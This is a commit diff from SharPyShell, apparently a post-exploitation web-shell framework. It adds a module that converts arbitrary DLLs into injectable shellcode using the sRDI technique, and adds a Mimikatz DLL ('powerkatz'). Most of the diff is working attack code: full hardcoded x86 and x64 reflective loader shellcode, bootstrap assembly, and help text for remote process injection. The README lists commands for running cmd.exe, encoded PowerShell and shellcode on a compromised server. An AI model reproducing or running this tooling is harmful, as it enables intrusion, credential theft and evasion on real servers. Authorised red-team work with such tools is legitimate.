STRLCPY/SharPyShell

added injection_srdi module + dll execution type for mimikatz
antonioCoco committed 5 years ago

dad54643

1 parent 78b96b4a

■ ■ ■ ■ ■ ■

README.md

		skipped 98 lines
99	99		#exec_cmd Run a cmd.exe /c command on the server
100	100		#exec_ps Run a powershell.exe -nop -noni -enc 'base64command' on the server
101	101		#inject_dll_reflective Inject a reflective DLL in a new (or existing) process
	102	+	#inject_dll_srdi Inject a generic DLL in a new (or existing) process
102	103		#inject_shellcode Inject shellcode in a new (or existing) process
103	104		#invoke_ps_module Run a ps1 script on the target server
104	105		#invoke_ps_module_as Run a ps1 script on the target server as a specific user
		skipped 50 lines

■ ■ ■ ■ ■ ■

core/config.py

1	1		import sys
2	2		import os
3	3
4		-	sharpyshell_version='1.1.9'
	4	+	sharpyshell_version='1.1.10'
5	5
6	6		header = '#SharPyShell v' + sharpyshell_version + ' - @splinter_code'
7	7		banner = """
		skipped 18 lines

modules/dll/messagebox_msf.dll

Binary file.
modules/dll/powerkatz.dll

Binary file.

■ ■ ■ ■ ■ ■

modules/inject_dll_reflective.py

		skipped 18 lines
19	19		Inject a reflective DLL into a remote process.
20	20		You can choose to create a new process or use a pid of an existing process as a host process.
21	21		The dll_path is a relative path to a dll that exists in the folder 'reflective_dll/'.
22		-	The dll must be compiled with the reflective loader exported function otherwise it cannot be executed
	22	+	The dll must be compiled with the 'ReflectiveLoader' exported function otherwise it cannot be executed
23	23		at runtime.
24	24		You can use one of the following supported injection technique:
25	25		- remote_virtual: classic injection:
		skipped 52 lines

■ ■ ■ ■ ■ ■

modules/inject_dll_srdi.py

1	+	from modules.inject_shellcode import Inject_shellcode, ModuleException
2	+	from core import config
3	+	from utils import gzip_utils
4	+	from struct import pack, unpack
5	+
6	+
7	+	class InjectDllSrdiModuleException(ModuleException):
8	+	pass
9	+
10	+
11	+	class sRDI:
12	+	"""
13	+	Author: @monoxgas
14	+	Link: https://github.com/monoxgas/sRDI
15	+	"""
16	+
17	+	__MACHINE_IA64 = 512
18	+	__MACHINE_AMD64 = 34404
19	+
20	+	def __is64BitDLL(self, bytes):
21	+	header_offset = unpack("<L", bytes[60:64])[0]
22	+	machine = unpack("<H", bytes[header_offset + 4:header_offset + 4 + 2])[0]
23	+	if machine == self.__MACHINE_IA64 or machine == self.__MACHINE_AMD64:
24	+	return True
25	+	return False
26	+
27	+
28	+	def HashFunctionName(self, name, module=None):
29	+	ror = lambda val, r_bits, max_bits: \
30	+	((val & (2 ** max_bits - 1)) >> r_bits % max_bits) \| \
31	+	(val << (max_bits - (r_bits % max_bits)) & (2 ** max_bits - 1))
32	+
33	+	function = name.encode() + b'\x00'
34	+
35	+	if (module):
36	+	module = module.upper().encode('UTF-16LE') + b'\x00\x00'
37	+
38	+	functionHash = 0
39	+
40	+	for b in function:
41	+	b = ord(b)
42	+	functionHash = ror(functionHash, 13, 32)
43	+	functionHash += b
44	+
45	+	moduleHash = 0
46	+
47	+	for b in module:
48	+	b = ord(b)
49	+	moduleHash = ror(moduleHash, 13, 32)
50	+	moduleHash += b
51	+
52	+	functionHash += moduleHash
53	+
54	+	if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000
55	+
56	+	else:
57	+	functionHash = 0
58	+
59	+	for b in function:
60	+	b = ord(b)
61	+	functionHash = ror(functionHash, 13, 32)
62	+	functionHash += b
63	+
64	+	return functionHash
65	+
66	+	def ConvertToShellcode(self, dllBytes, functionHash=0x10, userData=b'None', flags=1):
67	+
68	+	rdiShellcode32 = b"\x83\xEC\x48\x83\x64\x24\x18\x00\xB9\x4C\x77\x26\x07\x53\x55\x56\x57\x33\xF6\xE8\x5C\x04\x00\x00\xB9\x49\xF7\x02\x78\x89\x44\x24\x1C\xE8\x4E\x04\x00\x00\xB9\x58\xA4\x53\xE5\x89\x44\x24\x20\xE8\x40\x04\x00\x00\xB9\x10\xE1\x8A\xC3\x8B\xE8\xE8\x34\x04\x00\x00\xB9\xAF\xB1\x5C\x94\x89\x44\x24\x2C\xE8\x26\x04\x00\x00\xB9\x33\x00\x9E\x95\x89\x44\x24\x30\xE8\x18\x04\x00\x00\x8B\xD8\x8B\x44\x24\x5C\x8B\x78\x3C\x03\xF8\x89\x7C\x24\x14\x81\x3F\x50\x45\x00\x00\x74\x07\x33\xC0\xE9\xF2\x03\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x47\x04\x75\xEE\xF6\x47\x38\x01\x75\xE8\x0F\xB7\x57\x06\x0F\xB7\x47\x14\x85\xD2\x74\x22\x8D\x4F\x24\x03\xC8\x83\x79\x04\x00\x8B\x01\x75\x05\x03\x47\x38\xEB\x03\x03\x41\x04\x3B\xC6\x0F\x47\xF0\x83\xC1\x28\x83\xEA\x01\x75\xE3\x8D\x44\x24\x34\x50\xFF\xD3\x8B\x44\x24\x38\x8B\x5F\x50\x8D\x50\xFF\x8D\x48\xFF\xF7\xD2\x48\x03\xCE\x03\xC3\x23\xCA\x23\xC2\x3B\xC1\x75\x97\x6A\x04\xBE\x00\x30\x00\x00\x56\x53\xFF\x77\x34\xFF\xD5\x8B\xD8\x89\x5C\x24\x10\x85\xDB\x75\x0F\x6A\x04\x56\xFF\x77\x50\x50\xFF\xD5\x8B\xD8\x89\x44\x24\x10\x8B\x77\x54\x33\xC0\x8B\x6C\x24\x5C\x40\x33\xC9\x89\x44\x24\x24\x8B\xD3\x85\xF6\x74\x34\x8B\x5C\x24\x6C\x23\xD8\x4E\x85\xDB\x74\x19\x8B\xC7\x2B\x44\x24\x5C\x3B\xC8\x73\x0F\x83\xF9\x3C\x72\x05\x83\xF9\x3E\x76\x05\xC6\x02\x00\xEB\x05\x8A\x45\x00\x88\x02\x41\x45\x42\x85\xF6\x75\xD6\x8B\x5C\x24\x10\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x85\xC0\x74\x38\x83\xC7\x2C\x03\xCF\x8B\x7C\x24\x5C\x8B\x51\xF8\x48\x8B\x31\x03\xD3\x8B\x69\xFC\x03\xF7\x89\x44\x24\x5C\x85\xED\x74\x0F\x8A\x06\x88\x02\x42\x46\x83\xED\x01\x75\xF5\x8B\x44\x24\x5C\x83\xC1\x28\x85\xC0\x75\xD5\x8B\x7C\x24\x14\x8B\xB7\x80\x00\x00\x00\x03\xF3\x89\x74\x24\x18\x8B\x46\x0C\x85\xC0\x74\x7D\x03\xC3\x50\xFF\x54\x24\x20\x8B\x6E\x10\x8B\xF8\x8B\x06\x03\xEB\x03\xC3\x89\x44\x24\x5C\x83\x7D\x00\x00\x74\x4F\x8B\x74\x24\x20\x8B\x08\x85\xC9\x74\x1E\x79\x1C\x8B\x47\x3C\x0F\xB7\xC9\x8B\x44\x38\x78\x2B\x4C\x38\x10\x8B\x44\x38\x1C\x8D\x04\x88\x8B\x04\x38\x03\xC7\xEB\x0C\x8B\x45\x00\x83\xC0\x02\x03\xC3\x50\x57\xFF\xD6\x89\x45\x00\x83\xC5\x04\x8B\x44\x24\x5C\x83\xC0\x04\x89\x44\x24\x5C\x83\x7D\x00\x00\x75\xB9\x8B\x74\x24\x18\x8B\x46\x20\x83\xC6\x14\x89\x74\x24\x18\x85\xC0\x75\x87\x8B\x7C\x24\x14\x8B\xC3\x2B\x47\x34\x89\x44\x24\x1C\x0F\x84\xBB\x00\x00\x00\x83\xBF\xA4\x00\x00\x00\x00\x0F\x84\xAE\x00\x00\x00\x8B\xB7\xA0\x00\x00\x00\x03\xF3\x89\x74\x24\x5C\x8D\x4E\x04\x8B\x01\x89\x4C\x24\x18\x85\xC0\x0F\x84\x91\x00\x00\x00\x8B\x7C\x24\x1C\x8B\x16\x8D\x68\xF8\x03\xD3\x8D\x46\x08\xD1\xED\x89\x44\x24\x20\x74\x60\x6A\x02\x8B\xD8\x5E\x0F\xB7\x0B\x4D\x66\x8B\xC1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x74\x06\x66\x83\xF8\x03\x75\x0B\x81\xE1\xFF\x0F\x00\x00\x01\x3C\x11\xEB\x27\x66\x3B\x44\x24\x24\x75\x11\x81\xE1\xFF\x0F\x00\x00\x8B\xC7\xC1\xE8\x10\x66\x01\x04\x11\xEB\x0F\x66\x3B\xC6\x75\x0A\x81\xE1\xFF\x0F\x00\x00\x66\x01\x3C\x11\x03\xDE\x85\xED\x75\xB1\x8B\x5C\x24\x10\x8B\x74\x24\x5C\x8B\x4C\x24\x18\x03\x31\x89\x74\x24\x5C\x8D\x4E\x04\x8B\x01\x89\x4C\x24\x18\x85\xC0\x0F\x85\x77\xFF\xFF\xFF\x8B\x7C\x24\x14\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x85\xC0\x0F\x84\xB7\x00\x00\x00\x8B\x74\x24\x5C\x8D\x6F\x3C\x03\xE9\x48\x83\x7D\xEC\x00\x89\x44\x24\x24\x0F\x86\x94\x00\x00\x00\x8B\x4D\x00\x33\xD2\x42\x8B\xC1\xC1\xE8\x1D\x23\xC2\x8B\xD1\xC1\xEA\x1E\x83\xE2\x01\xC1\xE9\x1F\x85\xC0\x75\x18\x85\xD2\x75\x07\x6A\x08\x5E\x6A\x01\xEB\x05\x6A\x04\x5E\x6A\x02\x85\xC9\x58\x0F\x44\xF0\xEB\x2C\x85\xD2\x75\x17\x85\xC9\x75\x04\x6A\x10\xEB\x15\x85\xD2\x75\x0B\x85\xC9\x74\x18\xBE\x80\x00\x00\x00\xEB\x11\x85\xC9\x75\x05\x6A\x20\x5E\xEB\x08\x6A\x40\x85\xC9\x58\x0F\x45\xF0\x8B\x4D\x00\x8B\xC6\x0D\x00\x02\x00\x00\x81\xE1\x00\x00\x00\x04\x0F\x44\xC6\x8B\xF0\x8D\x44\x24\x28\x50\x8B\x45\xE8\x56\xFF\x75\xEC\x03\xC3\x50\xFF\x54\x24\x3C\x85\xC0\x0F\x84\xD0\xFC\xFF\xFF\x8B\x44\x24\x24\x83\xC5\x28\x85\xC0\x0F\x85\x52\xFF\xFF\xFF\x8B\x77\x28\x6A\x00\x6A\x00\x6A\xFF\x03\xF3\xFF\x54\x24\x3C\x33\xC0\x40\x50\x50\x53\xFF\xD6\x83\x7C\x24\x60\x00\x74\x7C\x83\x7F\x7C\x00\x74\x76\x8B\x4F\x78\x03\xCB\x8B\x41\x18\x85\xC0\x74\x6A\x83\x79\x14\x00\x74\x64\x8B\x69\x20\x8B\x79\x24\x03\xEB\x83\x64\x24\x5C\x00\x03\xFB\x85\xC0\x74\x51\x8B\x75\x00\x03\xF3\x33\xD2\x0F\xBE\x06\xC1\xCA\x0D\x03\xD0\x46\x80\x7E\xFF\x00\x75\xF1\x39\x54\x24\x60\x74\x16\x8B\x44\x24\x5C\x83\xC5\x04\x40\x83\xC7\x02\x89\x44\x24\x5C\x3B\x41\x18\x72\xD0\xEB\x1F\x0F\xB7\x17\x83\xFA\xFF\x74\x17\x8B\x41\x1C\xFF\x74\x24\x68\xFF\x74\x24\x68\x8D\x04\x90\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\xF6\x44\x24\x6C\x02\x74\x17\x8B\x6C\x24\x1C\x33\xC0\x68\x00\x80\x00\x00\x6A\x00\x55\xFF\xD0\x85\xC0\x75\x03\x55\xFF\xD0\x8B\xC3\x5F\x5E\x5D\x5B\x83\xC4\x48\xC3\x83\xEC\x10\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x18\x8B\x70\x0C\xE9\x8A\x00\x00\x00\x8B\x46\x30\x33\xC9\x8B\x5E\x2C\x8B\x36\x89\x44\x24\x14\x8B\x42\x3C\x8B\x6C\x10\x78\x89\x6C\x24\x10\x85\xED\x74\x6D\xC1\xEB\x10\x33\xFF\x85\xDB\x74\x1F\x8B\x6C\x24\x14\x8A\x04\x2F\xC1\xC9\x0D\x3C\x61\x0F\xBE\xC0\x7C\x03\x83\xC1\xE0\x03\xC8\x47\x3B\xFB\x72\xE9\x8B\x6C\x24\x10\x8B\x44\x2A\x20\x33\xDB\x8B\x7C\x2A\x18\x03\xC2\x89\x7C\x24\x14\x85\xFF\x74\x31\x8B\x28\x33\xFF\x03\xEA\x83\xC0\x04\x89\x44\x24\x1C\x0F\xBE\x45\x00\xC1\xCF\x0D\x03\xF8\x45\x80\x7D\xFF\x00\x75\xF0\x8D\x04\x0F\x3B\x44\x24\x18\x74\x20\x8B\x44\x24\x1C\x43\x3B\x5C\x24\x14\x72\xCF\x8B\x56\x18\x85\xD2\x0F\x85\x6B\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x10\xC3\x8B\x74\x24\x10\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB"
69	+	rdiShellcode64 = b"\x48\x8B\xC4\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x53\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x83\xEC\x78\x83\x60\x08\x00\x4C\x8B\xF1\xB9\x4C\x77\x26\x07\x33\xDB\xE8\xFB\x04\x00\x00\xB9\x49\xF7\x02\x78\x4C\x8B\xE8\xE8\xEE\x04\x00\x00\xB9\x58\xA4\x53\xE5\x48\x89\x44\x24\x20\xE8\xDF\x04\x00\x00\xB9\x10\xE1\x8A\xC3\x48\x8B\xE8\xE8\xD2\x04\x00\x00\xB9\xAF\xB1\x5C\x94\x48\x89\x44\x24\x30\xE8\xC3\x04\x00\x00\xB9\x33\x00\x9E\x95\x48\x89\x44\x24\x28\x4C\x8B\xE0\xE8\xB1\x04\x00\x00\x49\x63\x7E\x3C\x4C\x8B\xC8\x49\x03\xFE\x81\x3F\x50\x45\x00\x00\x74\x07\x33\xC0\xE9\x86\x04\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x75\xEE\x41\xBF\x01\x00\x00\x00\x44\x84\x7F\x38\x75\xE2\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x44\x8B\x47\x38\x85\xC0\x74\x2B\x48\x83\xC1\x24\x8B\xD0\x48\x03\xCF\x83\x79\x04\x00\x75\x07\x8B\x01\x49\x03\xC0\xEB\x05\x8B\x01\x03\x41\x04\x48\x3B\xC3\x48\x0F\x47\xD8\x48\x83\xC1\x28\x49\x2B\xD7\x75\xDE\x48\x8D\x4C\x24\x38\x41\xFF\xD1\x44\x8B\x44\x24\x3C\x44\x8B\x4F\x50\x41\x8D\x40\xFF\xF7\xD0\x41\x8D\x50\xFF\x41\x03\xD1\x49\x8D\x48\xFF\x48\x23\xD0\x48\x03\xCB\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x48\x3B\xD1\x0F\x85\x6C\xFF\xFF\xFF\x48\x8B\x4F\x30\x41\x8B\xD1\xBB\x00\x30\x00\x00\x41\xB9\x04\x00\x00\x00\x44\x8B\xC3\xFF\xD5\x45\x33\xDB\x48\x8B\xF0\x48\x85\xC0\x75\x14\x8B\x57\x50\x44\x8D\x48\x04\x44\x8B\xC3\x33\xC9\xFF\xD5\x48\x8B\xF0\x45\x33\xDB\x44\x8B\x47\x54\x4D\x8B\xCE\x48\x8B\xCE\x49\x8B\xD3\xBD\x02\x00\x00\x00\x4D\x85\xC0\x74\x3F\x44\x8B\x94\x24\xE0\x00\x00\x00\x45\x23\xD7\x4D\x2B\xC7\x45\x85\xD2\x74\x19\x48\x8B\xC7\x49\x2B\xC6\x48\x3B\xD0\x73\x0E\x48\x8D\x42\xC4\x48\x3B\xC5\x76\x05\x44\x88\x19\xEB\x05\x41\x8A\x01\x88\x01\x49\x03\xD7\x4D\x03\xCF\x49\x03\xCF\x4D\x85\xC0\x75\xCC\x44\x0F\xB7\x57\x06\x0F\xB7\x47\x14\x4D\x85\xD2\x74\x38\x48\x8D\x4F\x2C\x48\x03\xC8\x8B\x51\xF8\x4D\x2B\xD7\x44\x8B\x01\x48\x03\xD6\x44\x8B\x49\xFC\x4D\x03\xC6\x4D\x85\xC9\x74\x10\x41\x8A\x00\x4D\x03\xC7\x88\x02\x49\x03\xD7\x4D\x2B\xCF\x75\xF0\x48\x83\xC1\x28\x4D\x85\xD2\x75\xCF\x8B\x9F\x90\x00\x00\x00\x48\x03\xDE\x8B\x43\x0C\x85\xC0\x0F\x84\x85\x00\x00\x00\x48\x8B\x6C\x24\x20\x8B\xC8\x48\x03\xCE\x41\xFF\xD5\x44\x8B\x3B\x4C\x8B\xE0\x44\x8B\x73\x10\x4C\x03\xFE\x4C\x03\xF6\x45\x33\xDB\xEB\x4B\x4D\x39\x1F\x7D\x29\x49\x63\x44\x24\x3C\x41\x0F\xB7\x17\x42\x8B\x8C\x20\x88\x00\x00\x00\x42\x8B\x44\x21\x10\x42\x8B\x4C\x21\x1C\x48\x2B\xD0\x49\x03\xCC\x8B\x04\x91\x49\x03\xC4\xEB\x12\x49\x8B\x16\x49\x8B\xCC\x48\x83\xC2\x02\x48\x03\xD6\xFF\xD5\x45\x33\xDB\x49\x89\x06\x49\x83\xC6\x08\x49\x83\xC7\x08\x4D\x39\x1E\x75\xB0\x8B\x43\x20\x48\x83\xC3\x14\x85\xC0\x75\x88\x4C\x8B\x64\x24\x28\x8D\x68\x02\x4C\x8B\xFE\x41\xBD\x01\x00\x00\x00\x4C\x2B\x7F\x30\x0F\x84\xA4\x00\x00\x00\x44\x39\x9F\xB4\x00\x00\x00\x0F\x84\x97\x00\x00\x00\x44\x8B\x87\xB0\x00\x00\x00\x4C\x03\xC6\x41\x8B\x40\x04\x85\xC0\x0F\x84\x81\x00\x00\x00\xBB\xFF\x0F\x00\x00\x41\x8B\x10\x4D\x8D\x50\x08\x44\x8B\xC8\x48\x03\xD6\x49\x83\xE9\x08\x49\xD1\xE9\x74\x57\x41\x0F\xB7\x0A\x4D\x2B\xCD\x0F\xB7\xC1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x09\x48\x23\xCB\x4C\x01\x3C\x11\xEB\x32\x66\x83\xF8\x03\x75\x09\x48\x23\xCB\x44\x01\x3C\x11\xEB\x23\x66\x41\x3B\xC5\x75\x10\x48\x23\xCB\x49\x8B\xC7\x48\xC1\xE8\x10\x66\x01\x04\x11\xEB\x0D\x66\x3B\xC5\x75\x08\x48\x23\xCB\x66\x44\x01\x3C\x11\x4C\x03\xD5\x4D\x85\xC9\x75\xA9\x41\x8B\x40\x04\x4C\x03\xC0\x41\x8B\x40\x04\x85\xC0\x75\x84\x0F\xB7\x6F\x06\x0F\xB7\x47\x14\x48\x85\xED\x0F\x84\xD9\x00\x00\x00\x8B\x9C\x24\xC0\x00\x00\x00\x4C\x8D\x77\x3C\x4C\x8B\x6C\x24\x30\x4C\x03\xF0\x41\xB9\x01\x00\x00\x00\x49\x2B\xE9\x45\x39\x5E\xEC\x0F\x86\xA2\x00\x00\x00\x45\x8B\x06\x41\x8B\xD0\xC1\xEA\x1E\x41\x8B\xC0\x41\x8B\xC8\xC1\xE8\x1D\x41\x23\xD1\xC1\xE9\x1F\x41\x23\xC1\x75\x1C\x85\xD2\x75\x0C\xF7\xD9\x1B\xDB\x83\xE3\x07\x41\x03\xD9\xEB\x3B\xF7\xD9\x1B\xDB\x83\xE3\x02\x83\xC3\x02\xEB\x2F\x85\xD2\x75\x18\x85\xC9\x75\x05\x8D\x5A\x10\xEB\x22\x85\xD2\x75\x0B\x85\xC9\x74\x1A\xBB\x80\x00\x00\x00\xEB\x13\x85\xC9\x75\x05\x8D\x59\x20\xEB\x0A\x85\xC9\xB8\x40\x00\x00\x00\x0F\x45\xD8\x41\x8B\x4E\xE8\x4C\x8D\x8C\x24\xC0\x00\x00\x00\x41\x8B\x56\xEC\x8B\xC3\x0F\xBA\xE8\x09\x41\x81\xE0\x00\x00\x00\x04\x0F\x44\xC3\x48\x03\xCE\x44\x8B\xC0\x8B\xD8\x41\xFF\xD5\x45\x33\xDB\x85\xC0\x0F\x84\x75\xFC\xFF\xFF\x45\x8D\x4B\x01\x49\x83\xC6\x28\x48\x85\xED\x0F\x85\x44\xFF\xFF\xFF\x44\x8D\x6D\x01\x8B\x5F\x28\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\x48\x03\xDE\x41\xFF\xD4\x4D\x8B\xC5\x41\x8B\xD5\x48\x8B\xCE\xFF\xD3\x8B\xAC\x24\xC8\x00\x00\x00\x45\x33\xF6\x85\xED\x0F\x84\x99\x00\x00\x00\x44\x39\xB7\x8C\x00\x00\x00\x0F\x84\x8C\x00\x00\x00\x8B\x97\x88\x00\x00\x00\x48\x03\xD6\x44\x8B\x5A\x18\x45\x85\xDB\x74\x7A\x44\x39\x72\x14\x74\x74\x44\x8B\x52\x20\x41\x8B\xDE\x44\x8B\x4A\x24\x4C\x03\xD6\x4C\x03\xCE\x45\x85\xDB\x74\x5E\x45\x8B\x02\x41\x8B\xCE\x4C\x03\xC6\x41\x0F\xBE\x00\x4D\x03\xC5\xC1\xC9\x0D\x03\xC8\x45\x38\x70\xFF\x75\xEE\x3B\xE9\x74\x12\x41\x03\xDD\x49\x83\xC2\x04\x49\x83\xC1\x02\x41\x3B\xDB\x72\xD1\xEB\x2D\x41\x0F\xB7\x01\x83\xF8\xFF\x74\x24\x8B\x52\x1C\x48\x8B\x8C\x24\xD0\x00\x00\x00\xC1\xE0\x02\x48\x98\x48\x03\xC6\x44\x8B\x04\x02\x8B\x94\x24\xD8\x00\x00\x00\x4C\x03\xC6\x41\xFF\xD0\xF6\x84\x24\xE0\x00\x00\x00\x02\x74\x18\x33\xD2\x41\xB8\x00\x80\x00\x00\x49\x8B\xCF\x41\xFF\xD6\x85\xC0\x75\x06\x49\x8B\xCF\x41\xFF\xD6\x48\x8B\xC6\x48\x83\xC4\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\x5B\xC3\xCC\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x10\x57\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xF1\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41\x30\x4D\x85\xC0\x0F\x84\xB4\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x33\xD2\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x42\x8B\x9C\x00\x88\x00\x00\x00\x85\xDB\x74\xD4\x48\x8B\x04\x24\x48\xC1\xE8\x10\x44\x0F\xB7\xD0\x45\x85\xD2\x74\x21\x48\x8B\x4C\x24\x08\x45\x8B\xDA\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEB\x01\x75\xE7\x4D\x8D\x14\x18\x33\xC9\x41\x8B\x7A\x20\x49\x03\xF8\x41\x39\x4A\x18\x76\x8F\x8B\x1F\x45\x33\xDB\x49\x03\xD8\x48\x8D\x7F\x04\x0F\xBE\x03\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD8\x80\x7B\xFF\x00\x75\xED\x41\x8D\x04\x13\x3B\xC6\x74\x0D\xFF\xC1\x41\x3B\x4A\x18\x72\xD1\xE9\x5B\xFF\xFF\xFF\x41\x8B\x42\x24\x03\xC9\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x74\x24\x28\x48\x83\xC4\x10\x5F\xC3"
70	+
71	+	if self.__is64BitDLL(dllBytes):
72	+
73	+	rdiShellcode = rdiShellcode64
74	+
75	+	bootstrap = b''
76	+	bootstrapSize = 64
77	+
78	+	# call next instruction (Pushes next instruction address to stack)
79	+	bootstrap += b'\xe8\x00\x00\x00\x00'
80	+
81	+	# Set the offset to our DLL from pop result
82	+	dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
83	+
84	+	# pop rcx - Capture our current location in memory
85	+	bootstrap += b'\x59'
86	+
87	+	# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
88	+	bootstrap += b'\x49\x89\xc8'
89	+
90	+	# add rcx, <Offset of the DLL>
91	+	bootstrap += b'\x48\x81\xc1'
92	+	bootstrap += pack('I', dllOffset)
93	+
94	+	# mov edx, <Hash of function>
95	+	bootstrap += b'\xba'
96	+	bootstrap += pack('I', functionHash)
97	+
98	+	# Setup the location of our user data
99	+	# add r8, <Offset of the DLL> + <Length of DLL>
100	+	bootstrap += b'\x49\x81\xc0'
101	+	userDataLocation = dllOffset + len(dllBytes)
102	+	bootstrap += pack('I', userDataLocation)
103	+
104	+	# mov r9d, <Length of User Data>
105	+	bootstrap += b'\x41\xb9'
106	+	bootstrap += pack('I', len(userData))
107	+
108	+	# push rsi - save original value
109	+	bootstrap += b'\x56'
110	+
111	+	# mov rsi, rsp - store our current stack pointer for later
112	+	bootstrap += b'\x48\x89\xe6'
113	+
114	+	# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
115	+	bootstrap += b'\x48\x83\xe4\xf0'
116	+
117	+	# sub rsp, 0x30 - Create some breathing room on the stack
118	+	bootstrap += b'\x48\x83\xec'
119	+	bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
120	+
121	+	# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
122	+	bootstrap += b'\xC7\x44\x24'
123	+	bootstrap += b'\x20'
124	+	bootstrap += pack('I', flags)
125	+
126	+	# call - Transfer execution to the RDI
127	+	bootstrap += b'\xe8'
128	+	bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
129	+	bootstrap += b'\x00\x00\x00'
130	+
131	+	# mov rsp, rsi - Reset our original stack pointer
132	+	bootstrap += b'\x48\x89\xf4'
133	+
134	+	# pop rsi - Put things back where we left them
135	+	bootstrap += b'\x5e'
136	+
137	+	# ret - return to caller
138	+	bootstrap += b'\xc3'
139	+
140	+	if len(bootstrap) != bootstrapSize:
141	+	raise InjectDllSrdiModuleException("x64 bootstrap length: {} != bootstrapSize: {}".format(len(bootstrap), bootstrapSize))
142	+
143	+	# Ends up looking like this in memory:
144	+	# Bootstrap shellcode
145	+	# RDI shellcode
146	+	# DLL bytes
147	+	# User data
148	+	return bootstrap + rdiShellcode + dllBytes + userData
149	+
150	+	else: # 32 bit
151	+	rdiShellcode = rdiShellcode32
152	+
153	+	bootstrap = b''
154	+	bootstrapSize = 46
155	+
156	+	# call next instruction (Pushes next instruction address to stack)
157	+	bootstrap += b'\xe8\x00\x00\x00\x00'
158	+
159	+	# Set the offset to our DLL from pop result
160	+	dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
161	+
162	+	# pop eax - Capture our current location in memory
163	+	bootstrap += b'\x58'
164	+
165	+	# push ebp
166	+	bootstrap += b'\x55'
167	+
168	+	# mov ebp, esp
169	+	bootstrap += b'\x89\xe5'
170	+
171	+	# mov ebx, eax - copy our location in memory to ebx before we start modifying eax
172	+	bootstrap += b'\x89\xc3'
173	+
174	+	# add eax, <Offset to the DLL>
175	+	bootstrap += b'\x05'
176	+	bootstrap += pack('I', dllOffset)
177	+
178	+	# add ebx, <Offset to the DLL> + <Size of DLL>
179	+	bootstrap += b'\x81\xc3'
180	+	userDataLocation = dllOffset + len(dllBytes)
181	+	bootstrap += pack('I', userDataLocation)
182	+
183	+	# push <Flags>
184	+	bootstrap += b'\x68'
185	+	bootstrap += pack('I', flags)
186	+
187	+	# push <Length of User Data>
188	+	bootstrap += b'\x68'
189	+	bootstrap += pack('I', len(userData))
190	+
191	+	# push ebx
192	+	bootstrap += b'\x53'
193	+
194	+	# push <hash of function>
195	+	bootstrap += b'\x68'
196	+	bootstrap += pack('I', functionHash)
197	+
198	+	# push eax
199	+	bootstrap += b'\x50'
200	+
201	+	# call - Transfer execution to the RDI
202	+	bootstrap += b'\xe8'
203	+	bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
204	+	bootstrap += b'\x00\x00\x00'
205	+
206	+	# leave
207	+	bootstrap += b'\xc9'
208	+
209	+	# ret - return to caller
210	+	bootstrap += b'\xc3'
211	+
212	+	if len(bootstrap) != bootstrapSize:
213	+	raise InjectDllSrdiModuleException("x86 bootstrap length: {} != bootstrapSize: {}".format(len(bootstrap), bootstrapSize))
214	+
215	+	# Ends up looking like this in memory:
216	+	# Bootstrap shellcode
217	+	# RDI shellcode
218	+	# DLL bytes
219	+	# User data
220	+	return bootstrap + rdiShellcode + dllBytes + userData
221	+
222	+
223	+	class Inject_dll_srdi(Inject_shellcode):
224	+	_exception_class = InjectDllSrdiModuleException
225	+	short_help = "Inject a generic DLL in a new (or existing) process"
226	+	complete_help = r"""
227	+	Author: @monoxgas
228	+	Link: https://github.com/monoxgas/sRDI
229	+
230	+
231	+	Inject a generic DLL into a remote process.
232	+	This module convert a generic DLL into a position independent Shellcode ready to be injected.
233	+	You can choose to create a new process or use a pid of an existing process as a host process.
234	+	The dll_path is a relative path to a dll that exists in the folder 'dll/'.
235	+	You can use one of the following supported injection technique:
236	+	- remote_virtual: classic injection:
237	+	VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
238	+	- remote_virtual_protect: with this technique you never allocate RWX memory (polymorphic encoders won't work):
239	+	VirtualAllocEx(RW) -> WriteProcessMemory -> VirtualProtect(RX) -> CreateRemoteThread
240	+	Note that when you try to inject into an existing process you should ensure you have the rights to open
241	+	a handle to that process otherwise the injection cannot be performed.
242	+
243	+
244	+	Usage:
245	+	#inject_dll_srdi dll_path [injection_type] [remote_process]
246	+
247	+	Positional arguments:
248	+	dll_path name of a .dll module in the 'dll/' directory
